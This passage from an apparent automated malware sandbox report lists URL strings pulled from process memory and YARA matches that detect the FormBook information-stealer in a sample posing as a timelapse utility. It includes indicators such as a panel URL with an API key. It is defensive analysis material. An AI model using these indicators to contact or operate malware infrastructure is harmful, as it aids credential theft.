          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000006.00000000.2182892558.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000006.00000000.2181605324.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: vbc.exe, msiexec.exe, 00000007.00000002.2379855432.0000000000610000.00000004.00000001.sdmpString found in binary or memory: http://simpletimelapse.sourceforge.net/update/version.txt?Refresh=
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191376130.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000006.00000000.2182575060.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.2181605324.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000006.00000000.2191376130.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000006.00000002.2380071243.0000000001C70000.00000002.00000001.sdmp, msiexec.exe, 00000007.00000002.2380051808.0000000001F60000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2182575060.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000006.00000000.2181421979.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2181605324.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.2182575060.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2181421979.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2181232579.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.2188725963.000000000861C000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2181421979.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
          Source: vbc.exe, msiexec.exe, 00000007.00000002.2379855432.0000000000610000.00000004.00000001.sdmpString found in binary or memory: https://api.lightboot.org/panel/index.php?page=Api&key=b6udeJ2WqDoyHKzzsEjfG3QajboCjeJv&host=
          Source: vbc.exe, vbc.exe, 00000005.00000002.2224261783.0000000001302000.00000020.00020000.sdmp, msiexec.exe, 00000007.00000002.2379855432.0000000000610000.00000004.00000001.sdmpString found in binary or memory: https://ffmpeg.org
          Source: vbc.exeString found in binary or memory: https://simpletimelapse.sourceforge.io/update/changelog.txt
          Source: vbc.exeString found in binary or memory: https://simpletimelapse.sourceforge.io/update/version.txt
          Source: vbc.exe, 00000004.00000000.2162721607.0000000001302000.00000020.00020000.sdmp, vbc.exe, 00000005.00000002.2224261783.0000000001302000.00000020.00020000.sdmp, msiexec.exe, 00000007.00000002.2379855432.0000000000610000.00000004.00000001.sdmpString found in binary or memory: https://simpletimelapse.sourceforge.io/update/version.txtwhttps://simpletimelapse.sourceforge.io/upd
          Source: vbc.exe, vbc.exe, 00000005.00000002.2224261783.0000000001302000.00000020.00020000.sdmp, msiexec.exe, 00000007.00000002.2379855432.0000000000610000.00000004.00000001.sdmpString found in binary or memory: https://www.flaticon.com/packs/free-basic-ui-elements

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.2222809957.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2379572834.0000000000090000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2379681333.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2222743183.0000000000220000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2379729780.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2168902799.00000000037C9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2222674041.0000000000130000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000005.00000002.2222809957.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2222809957.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2379572834.0000000000090000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2379572834.0000000000090000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
